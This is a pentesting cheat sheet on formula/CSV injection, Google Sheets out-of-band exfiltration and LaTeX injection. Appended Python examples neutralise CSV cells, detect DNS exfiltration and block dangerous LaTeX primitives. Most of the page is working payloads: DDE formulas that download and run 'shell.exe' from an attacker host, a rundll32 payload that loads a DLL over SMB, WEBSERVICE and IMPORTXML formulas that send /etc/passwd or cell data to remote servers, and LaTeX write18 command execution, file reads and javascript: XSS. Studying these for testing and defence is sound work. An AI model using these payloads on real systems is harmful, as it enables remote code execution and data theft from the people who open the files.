# Formula/CSV/Doc/LaTeX/GhostScript Injection
## Formula Injection

### Info

If your **input** is **reflected** into a **CSV file** (or any other file that is likely to be opened by **Excel**), you may be able to place Excel **formulas** that will be **executed** when the user **opens the file** or **clicks a link** inside the Excel sheet.

{% hint style="danger" %}
Current **Excel versions warn** the user (several times) **when content is loaded from outside Excel**, to stop them from doing something harmful. Extra social-engineering effort is therefore needed for the final payload.
{% endhint %}

### [Dictionary](https://github.com/payloadbox/csv-injection-payloads)

```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```

### Hyperlinks

**The following example is very useful for exfiltrating content from the final Excel sheet and sending requests to arbitrary locations. It does, however, require the user to click the link (and accept the warning prompts).**

Example taken from [https://payatu.com/csv-injection-basic-to-exploit](https://payatu.com/csv-injection-basic-to-exploit)

Assume an attack scenario against a school's student records management system. The application lets teachers enter student details. An attacker has gained access to the application and wants to compromise every teacher who uses it, so the attacker attempts a CSV injection attack through the web application.\
The attacker needs to steal the other students' details, so they use a hyperlink formula while entering a student's details.

![](https://payatu.com/wp-content/uploads/2017/11/Selection\_008.png)

When a teacher exports the CSV and clicks the hyperlink, the sensitive data is sent to the attacker's server.

![](https://payatu.com/wp-content/uploads/2017/11/Selection\_009.png)

The exported CSV file contains the malicious payload.

![](https://payatu.com/wp-content/uploads/2017/11/Selection\_010.png)

The student details are logged on the attacker's web server.

![](https://payatu.com/wp-content/uploads/2017/11/Selection\_011.png)

### RCE

For this example to work, **the following configuration must be enabled**:\
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch\
or an **old version of Excel** must be used.

The good news is that **this payload executes automatically when the file is opened** (if the user accepts the warnings).

The calculator can be launched with the payload **`=cmd|' /C calc'!xxx`**

```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```

### LFI

**LibreOffice Calc**

* This reads the first line of the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Exfiltrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Exfiltrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`

**Breakdown of the DNS exfiltration payload:**

* `'file:///etc/passwd'#$passwd.A19` - reads line 19 of the local /etc/passwd file
* `ENCODEURL('file:///etc/passwd'#$passwd.A19)` - URL-encodes the returned data
* `MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41)` - works like a substring: takes the data from the first to the 41st character. This is a very handy way to keep DNS hostnames within their length limits (254 characters for an FQDN, 63 characters per label, i.e. per subdomain)
* `SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")` - replaces every instance of % (URL-encoded special characters) with a dash, so that only valid DNS characters are used
* `CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".")` - concatenates the file output (after the processing above) with the FQDN (a domain whose authoritative host we control)
* `WEBSERVICE` - requests this non-existent DNS name; we can then parse the logs on the authoritative DNS name server (or run tcpdump, etc.)

### Google Sheets OOB data exfiltration

First, let's introduce some of the more interesting functions.

**CONCATENATE**: appends strings to each other.
```
=CONCATENATE(A2:E2)
```
**IMPORTXML**: imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: imports an RSS or ATOM feed.
```
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: imports data from a table or list within an HTML page.
```
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: imports a range of cells from a specified spreadsheet.
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: inserts an image into a cell.
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```

## LaTeX Injection

Servers found on the Internet that convert LaTeX code to PDF usually use `pdflatex`.\
This program uses 3 main attributes to (dis)allow command execution:

- `--no-shell-escape`: **disables** the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
- `--shell-restricted`: same as `--shell-escape`, but **limited** to a **predefined** set of "safe" commands (on Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
- `--shell-escape`: **enables** the `\write18{command}` construct. The command can be any shell command. This construct is usually disallowed for security reasons.

However, there are other ways to execute commands, so to avoid remote command execution (RCE) it is very important to use `--shell-restricted`.

### Read files

You may need to adjust the injection with wrappers such as \[ or $.

```bash
\input{/etc/passwd}
\include{password} # load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```

#### Read a single-line file

```bash
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```

#### Read a multi-line file

```bash
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```

### Write files

```bash
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```

### Command execution

The command's input is redirected to stdin; use a temporary file to get it.

```bash
\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```

If you run into any LaTeX errors, consider using base64 to get the result without bad characters.

```bash
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
```

```bash
\input|ls|base64
\input{|"/bin/hostname"}
```

### Cross-site scripting

From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)

```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```

## Ghostscript Injection

TODO: Extract the more relevant information and techniques from [https://blog.redteam-pentesting.de/2023/ghostscript-overview/](https://blog.redteam-pentesting.de/2023/ghostscript-overview/) and create a summary.

## References

* [https://notsosecure.com/data-exfiltration-formula-injection-part1](https://notsosecure.com/data-exfiltration-formula-injection-part1)
* [https://0day.work/hacking-with-latex/](https://0day.work/hacking-with-latex/)
* [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection)
* [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)
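The defensive counterpart to the Formula Injection and Google Sheets OOB sections above, as an added example that is not part of the original page: an export routine that stores any cell beginning with a formula trigger as text and a detection-only check for the DDE, WEBSERVICE, HYPERLINK and IMPORT* function names. The function names and sample rows are this example's own.

```python
# Added example, not from the original page: server-side neutralisation of values
# exported to CSV, covering the formula triggers (=, +, -, @, tab, CR) used by the
# DDE, HYPERLINK, WEBSERVICE and Google Sheets IMPORT* payloads above.
import csv
import io
import re

# Leading characters that make Excel/LibreOffice evaluate a cell instead of displaying it.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r", "\n")

# Function names and schemes from this page's payloads; used for detection/logging only.
SUSPECT_PATTERNS = re.compile(
    r"\bDDE\s*\(|\bcmd\s*\||\bWEBSERVICE\s*\(|\bIMPORT(?:XML|FEED|HTML|RANGE)\s*\(|"
    r"\bHYPERLINK\s*\(|\bIMAGE\s*\(|file://",
    re.IGNORECASE,
)


def looks_like_formula(value: str) -> bool:
    """True if a spreadsheet would treat the cell as a formula. Leading spaces are
    checked past defensively, in case the importer trims them before parsing."""
    stripped = value.lstrip(" ")
    return bool(stripped) and (value[0] in FORMULA_TRIGGERS or stripped[0] in FORMULA_TRIGGERS)


def is_suspicious(value: str) -> bool:
    """Detection-only check: does the cell name one of the functions discussed above?"""
    return SUSPECT_PATTERNS.search(value) is not None


def neutralize_cell(value: str) -> str:
    """Prefix an apostrophe so the cell is stored as text; the full quoting applied in
    export_csv keeps the field from breaking out of the CSV record."""
    return "'" + value if looks_like_formula(value) else value


def export_csv(rows) -> str:
    """Write rows with every field quoted, so embedded quotes/newlines stay inside the cell."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample rows mixing legitimate values with payloads from the page.
    sample = [["name", "note"], ["Alice", "=cmd|' /C calc'!A0"], ["Carol", "-5 degrees"]]
    for row in sample[1:]:
        if is_suspicious(row[1]):
            print("suspicious cell:", row)
    print(export_csv(sample))
```

Legitimate negative numbers such as `-5` also get the apostrophe; if numeric columns must stay numeric, apply the neutralisation only to free-text columns.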
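A detection for the DNS exfiltration encoding broken down in the LFI section above (URL-encoded line, truncated to 41 characters, `%` swapped for `-`), as an added example that is not part of the original page. The resolver log format, the thresholds and the sample lines are constructed for this example.

```python
# Added example, not from the original page: flag resolver queries whose leftmost label
# carries the ENCODEURL/SUBSTITUTE('%','-') encoding analysed above and recover the text.
# The log format is constructed (dnsmasq-style "query[A] <name> from <ip>").
import re
from urllib.parse import unquote

QUERY_RE = re.compile(r"query\[[A-Z]+\]\s+(\S+)\s+from\s+(\S+)")
ENCODED_BYTE = re.compile(r"-[0-9A-Fa-f]{2}")   # '%XX' after SUBSTITUTE('%','-')

# Heuristic thresholds (assumed, tune per environment): a long leftmost label holding
# several '-XX' sequences is unlike any normal hostname.
MIN_LABEL_LEN = 20
MIN_ENCODED_BYTES = 3


def is_exfil_label(label: str) -> bool:
    return len(label) >= MIN_LABEL_LEN and len(ENCODED_BYTE.findall(label)) >= MIN_ENCODED_BYTES


def decode_exfil_label(label: str) -> str:
    """Undo SUBSTITUTE('%','-') and ENCODEURL. Only meaningful for flagged labels,
    since a genuine hyphen in the leaked text is indistinguishable from an encoded byte."""
    return unquote(label.replace("-", "%"))


def scan_dns_log(lines):
    """Return (client, qname, decoded_fragment) for each query that looks like exfil."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname, client = m.groups()
        first_label = qname.split(".")[0]
        if is_exfil_label(first_label):
            hits.append((client, qname, decode_exfil_label(first_label)))
    return hits


# Constructed sample log: benign queries plus one carrying the first 41 URL-encoded
# characters of a passwd line ("root:x:0:0:root:/root:/bi" once decoded).
SAMPLE_LOG = [
    "Jan 10 12:00:01 dnsmasq[42]: query[A] www.example.com from 10.0.0.5",
    "Jan 10 12:00:02 dnsmasq[42]: query[A] root-3Ax-3A0-3A0-3Aroot-3A-2Froot-3A-2Fbi.exfil.example from 10.0.0.5",
    "Jan 10 12:00:03 dnsmasq[42]: query[A] my-host-01.corp.example from 10.0.0.7",
]

if __name__ == "__main__":
    for client, qname, text in scan_dns_log(SAMPLE_LOG):
        print(f"{client} leaked {text!r} via {qname}")
```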
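For the LaTeX Injection section above, a pre-compilation check a LaTeX-to-PDF service can run on untrusted input, as an added example that is not part of the original page: it flags the read, write, command-execution and `javascript:` primitives shown in that section and builds the `pdflatex` command line with shell escape disabled. The function names and descriptions are this example's own.

```python
# Added example, not from the original page: reject untrusted LaTeX that uses the
# primitives behind the read/write/exec/XSS payloads above, before pdflatex sees it.
import re

# (description, pattern) for constructs that should never appear in untrusted input.
DANGEROUS = [
    ("shell escape (\\write18)", re.compile(r"\\write18\b")),
    ("piped \\input (runs a command)", re.compile(r"\\input\s*\{?\s*\|")),
    ("file read primitive (\\openin/\\read)", re.compile(r"\\(?:openin|read)\b")),
    ("file write primitive (\\openout/\\write)", re.compile(r"\\(?:openout|write(?!18))\b")),
    ("absolute-path include", re.compile(r"\\(?:input|include)\s*\{\s*/")),
    ("verbatim file dump", re.compile(r"\\(?:verbatiminput|lstinputlisting)\b")),
    ("javascript: URI in \\url/\\href",
     re.compile(r"\\(?:url|href)\s*\{\s*javascript:", re.IGNORECASE)),
]


def find_dangerous_primitives(tex: str) -> list[str]:
    """Return the description of every flagged construct present, in DANGEROUS order."""
    return [desc for desc, rx in DANGEROUS if rx.search(tex)]


def pdflatex_argv(tex_path: str, out_dir: str) -> list[str]:
    """Converter command line: shell escape off, no interactive prompts, fixed output dir."""
    return ["pdflatex", "--no-shell-escape", "-interaction=nonstopmode", "-halt-on-error",
            f"-output-directory={out_dir}", tex_path]


def check_submission(tex: str) -> None:
    """Raise before the document reaches pdflatex if any construct is flagged."""
    found = find_dangerous_primitives(tex)
    if found:
        raise ValueError("rejected LaTeX input: " + "; ".join(found))


if __name__ == "__main__":
    # Constructed sample: one of the command-execution payloads from this page.
    sample = r"\immediate\write18{env > output}\input{output}"
    print(find_dangerous_primitives(sample))
    print(" ".join(pdflatex_argv("submission.tex", "/tmp/latex-out")))
```

The check is a blocklist and complements, rather than replaces, running `pdflatex` without shell escape (or with `--shell-restricted`) under a locked-down account.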